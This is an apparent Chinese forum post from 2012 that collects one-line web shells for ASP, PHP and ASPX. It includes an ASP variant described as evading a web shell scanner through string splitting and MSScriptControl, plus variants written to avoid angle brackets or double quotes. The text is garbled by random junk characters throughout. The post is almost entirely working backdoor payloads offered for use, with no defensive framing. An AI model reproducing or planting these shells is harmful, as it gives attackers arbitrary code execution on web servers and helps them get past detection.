asp一句话 <%execute(request("1"))%> {4 O5 s0 ^& c* {6 C2 \
9 r' p: Z8 a; R# f( N e+ o) mphp一句话 <?php eval($_POST[1]);?> 5 ]+ \2 l, j$ T; Y5 N
4 y' @% N4 D" L8 G3 ^8 S: E5 Waspx一句话
4 y7 a% t; J# e3 P' Y' M7 Q9 R5 u( N3 G* C
<script language="C#" runat="server">
3 G' i4 P. D2 k3 a# c8 c: N7 \" h4 B) N
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y ("add6bb58e139be10");) w, x& }) M. H. Y$ [- x) `5 p* `
9 G: B' T) c& B' P
</script>
3 J5 l7 \7 y% t5 B$ K- V1 r& _0 H1 O* [ p- t, x& S: K- P
可以躲过雷客图的一句话。
! }0 i; q: u4 F5 p& k
O* @; `9 p) c7 j <%
: Y& N% A6 z# h2 x6 P
U4 J# h) F5 O4 `: c, c! G2 _ K- B; O set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
9 G; S3 H2 A* L: E7 p2 G2 h J" W! G0 e; _1 v
ms.Language="VBScript"0 P' y4 L) y6 ~- p1 ~/ _' k" ]0 ?
) B( }4 q h3 R* a* \" o9 @% S( \
ms.AddObject "Response", Response
- E- e* \: f0 v7 Y8 j: W' {) P% h4 k7 I8 s
ms.AddObject "request", request4 K' @# |$ g8 n$ E* Y+ g3 E3 l' E
9 G, I N4 F' l9 V
ms.ExecuteStatement("ev"&"al(request(""1""))")
$ z0 d# }7 U9 N. a/ q7 W* T! O; b
9 P3 B6 H9 ?2 S) _& o4 n %>/ t4 @! v R0 @/ B/ g+ }$ s
8 Z. W4 x: ]3 {' J5 k: q
不用'<,>'的asp一句话1 L2 N: @( ]9 T3 X( c
' b6 F* B- a) Y$ K8 L2 i0 h <script language=VBScript runat=server>execute request("1")</script>1 R! u R3 K/ g1 b5 B3 O9 D
$ i, R: r- O* o+ U) Y- J7 K' ~ 不用双引号的一句话。
, ^: r# V! [' { P
% S! t& M6 x, L6 ` <%eval request(chr(35))%>
8 e: R: ?% ]1 [* ~- p: L1 r# D |
发表于 2012-9-23 14:36:09
收藏
支持
反对